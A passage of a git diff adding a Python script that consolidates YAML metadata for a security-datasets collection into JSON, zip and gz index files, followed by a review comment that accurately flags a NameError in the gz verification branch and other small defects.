z004ji00000b7f;KWOHS7b1i9ZWMz0RYIARHP)h{{000000RRC2LI3~&(B=RD0062M BwE+MC literal 0 HcmV?d00001 diff --git a/scripts/misc/create_json_index.py b/scripts/misc/create_json_index.py new file mode 100644 index 00000000..fb26f851 --- /dev/null +++ b/scripts/misc/create_json_index.py 
@@ -0,0 +1,203 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""
+Create json index from metadata files.
+
+This file is used primarily to allow remote fetching of Security Datasets
+metadata with minimal latency.
+
+It creates the following sets of files:
+/data/.index/sec-dsets-index.json
+/data/.index/sec-dsets-index.json.zip
+/data/.index/sec-dsets-index.json.gz
+
+"""
+import argparse
+import json
+import gzip
+import zipfile
+from pathlib import Path
+from typing import Any, Dict, Literal, Union, get_args
+
+import yaml
+
+_SD_DATA = "datasets"
+_SD_FOLDERS = ["atomic", "compound"]
+_MD_FOLDER = "_metadata"
+_DEF_INDEX_NAME = "sec-dsets-index"
+_DEF_OUT_FOLDER = ".index"
+
+OutputType = Literal["all", "json", "gz", "zip"]
+
+
+def main(
+ input_dir: Union[str, Path],
+ target_dir: Union[str, Path],
+ output: OutputType,
+ verify: bool = False,
+):
+ """
+ Consolidates yaml metadata files and writes json output.
+
+ Parameters
+ ----------
+ input_dir : Union[str, Path]_
+ Path to root of input data files.
+ target_dir : Union[str, Path]
+ Path to save output files.
+ output : OutputType
+ The format(s) to write the output files.
+ verify : bool
+ If True, verify the written files contain the same content
+ as the parsed yaml files.
+
+ """
+ index_dict = _metadata_to_dict(input_dir)
+ print("Metadata files read:")
+ print(f"{len(index_dict)} folders")
+ print(sum(len(fldr) for fldr in index_dict.values()), "files")
+ print(f"output to {target_dir}")
+ _write_index_files(index_dict, target_dir, output)
+
+ if verify:
+ _verify_files(index_dict=index_dict, target_dir=target_dir, output=output)
+
+
+def _read_metadata(source_dir: Union[str, Path]) -> Dict[str, Any]:
+ """Read folder of metadata yamls and returns dictionary."""
+ return {
+ str(Path(file).stem): yaml.safe_load(Path(file).read_text(encoding="utf-8"))
+ for file in Path(source_dir).joinpath(_MD_FOLDER).glob("*.yaml")
+ }
+
+
+def _metadata_to_dict(source_dir) -> Dict[str, Any]:
+ """Return consolidated dictionary of input folders."""
+ return {
+ folder: _read_metadata(Path(source_dir).joinpath(folder))
+ for folder in _SD_FOLDERS
+ }
+
+
+def _write_index_files(
+ index_dict: Dict[str, Any], target_dir: Union[str, Path], output: OutputType
+):
+ """
+ Write index file outputs.
+
+ Parameters
+ ----------
+ index_dict : Dict[str, Any]
+ File metadata dictionary.
+ target_dir : Union[str, Path]
+ Output folder.
+ output : OutputType
+ Output file types to write.
+
+ """
+ target_dir = Path(target_dir)
+ target_dir.mkdir(parents=True, exist_ok=True)
+ json_index_path = target_dir.joinpath(_DEF_INDEX_NAME).with_suffix(".json")
+ index_json = json.dumps(index_dict)
+
+ print("Output format", output)
+ if output in ("all", "json"):
+ json_index_path.write_text(index_json, encoding="utf-8")
+ print(f"created JSON index: {json_index_path}")
+ if output in ("all", "zip"):
+ with zipfile.ZipFile(
+ f"{json_index_path}.zip", "w", compression=zipfile.ZIP_BZIP2
+ ) as f_zip:
+ f_zip.writestr(json_index_path.name, data=bytes(index_json, encoding="utf-8"))
+ print(f"created zip index: {json_index_path}.zip")
+ if output in ("all", "gz"):
+ with gzip.open(f"{json_index_path}.gz", "wb") as f_gzip:
+ f_gzip.write(bytes(index_json, encoding="utf-8"))
+ print(f"created gz index: {json_index_path}.gz")
+
+
+def _verify_files(
+ index_dict: Dict[str, Any], target_dir: Union[str, Path], output: OutputType
+):
+ target_dir = Path(target_dir)
+ target_dir.mkdir(parents=True, exist_ok=True)
+ json_index_path = target_dir.joinpath(_DEF_INDEX_NAME).with_suffix(".json")
+
+ if output in ("all", "json"):
+ index_json = json_index_path.read_text(encoding="utf-8")
+ json_dict = json.loads(index_json)
+ if index_dict == json_dict:
+ print(f"Verified JSON index: {json_index_path}")
+ else:
+ print(f"ERROR: JSON index is different: {json_index_path}")
+
+ if output in ("all", "zip"):
+ with zipfile.ZipFile(f"{json_index_path}.zip", "r") as f_zip:
+ with f_zip.open(json_index_path.name, "r") as f_zip_file:
+ content = f_zip_file.read()
+ zip_dict = json.loads(content.decode(encoding="utf-8"))
+ if index_dict == zip_dict:
+ print(f"Verified ZIP index: {json_index_path}.zip")
+ else:
+ print(f"ERROR: ZIP index is different: {json_index_path}.zip")
+
+ if output in ("all", "gz"):
+ content = bytes(index_json, encoding="utf-8")
+ with gzip.open(f"{json_index_path}.gz", "rb") as f_gzip:
+ content = f_gzip.read()
+ gz_dict = json.loads(content.decode(encoding="utf-8"))
+ if index_dict == gz_dict:
+ print(f"Verified GZ index: {json_index_path}.gz")
+ else:
+ print(f"ERROR: GZ index is different: {json_index_path}.gz")
+
+
+def _add_script_args():
+ parser = argparse.ArgumentParser(description="Security datasets index generator")
+
+ parser.add_argument(
+ "--output-path",
+ "-o",
+ default=f"./{_SD_DATA}/{_DEF_OUT_FOLDER}",
+ required=False,
+ help="Path to output folder.",
+ )
+
+ parser.add_argument(
+ "--input-path",
+ "-i",
+ default=f"./{_SD_DATA}",
+ required=False,
+ help="Path to input folder holding atomic and compound datasets.",
+ )
+
+ parser.add_argument(
+ "--formats",
+ "-f",
+ default="all",
+ choices=get_args(OutputType),
+ required=False,
+ help="The type of output file(s) to create for the index.",
+ )
+ parser.add_argument(
+ "--verify",
+ "-v",
+ action="store_true",
+ help="Verify file(s) after writing.",
+ )
+ return parser
+
+
+if __name__ == "__main__":
+ arg_parser = _add_script_args()
+ args = arg_parser.parse_args()
+
+ main(
+ target_dir=args.output_path,
+ input_dir=args.input_path,
+ output=args.formats,
+ verify=args.verify,
+ )
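Review bot: In `_verify_files`, the gz branch opens with `content = bytes(index_json, encoding="utf-8")`, but `index_json` is only assigned inside the `if output in ("all", "json")` branch, so running with `--formats gz --verify` raises NameError before the archive is ever read. The assignment is also dead, because `content` is overwritten by `f_gzip.read()` two lines later; deleting that one line fixes it. Separately, a mismatch in any of the three branches only prints `ERROR: ... is different` and the script still exits 0, so a job that publishes the index for remote fetching would not notice a corrupted file. Consider having `_verify_files` return whether every check passed and ending `main` with `raise SystemExit(1)` when it did not. The docstring entry `input_dir : Union[str, Path]_` also carries a stray trailing underscore.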